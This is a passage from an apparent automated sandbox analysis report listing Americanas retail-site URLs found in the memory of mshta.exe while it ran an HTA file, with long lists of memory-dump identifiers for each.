00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508375868.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/assessoria-imprensa?chave=dk_hm_ft_00_03_imprensa
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579079120.000000000BE6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento?chave=dk_hm_ft_00_01_atendimento
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574962923.000000000967A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimentoDa
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578601158.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512492941.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE7A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510268517.000000000BDC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_entrega?chave=dk_hm_ft_00_04_entrega
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12578601158.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512492941.000000000BDE2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510268517.000000000BDC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/atendimento_trocasedevolucoes?chave=dk_hm_ft_00_02_trocas
Source: mshta.exeString found in binary or memory: https://www.americanas.com.br/hotsite/banner-cameba?chav
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573176961.000000000715C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557976604.0000000007154000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516075733.000000000964D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-cameba?chave=dk_hm_bn_5_4_cameba
Source: mshta.exeString found in binary or memory: https://www.americanas.com.br/hotsite/banner-esporte?chave=dk_hm_bn_5_1_es
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516075733.000000000964D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-esporte?chave=dk_hm_bn_5_1_esporte
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C10A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-pcs?chave=dk_hm_bn_5_2_pcs
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/banner-ud?chave=dk_hm_bn_5_7_udpwp
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/campanha-brinquedos?chave=dk_hm_dt_2_8_brinquedos
Source: mshta.exe, 00000001.00000003.12401711671.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12462713387.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396363836.0000000006A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=dk_hm_ats_2_6_cuponeriameta
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/cupom-de-desconto-americanas?chave=prf_hm_0_tt_9_cupom
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396762846.00000000069E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510715620.000000000BE74000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/cuponeria?chave=dk_hm_ft_00_07_cuponeria
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-automotivo?chave=
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-clima?chave=
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551073460.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-evento-brinq-esporte?chave=dk_hm_dt_2_9_brinquesporte
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/hotsite/destaque-moveis?chave=dk_hm_dt_2_1_moveis
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: 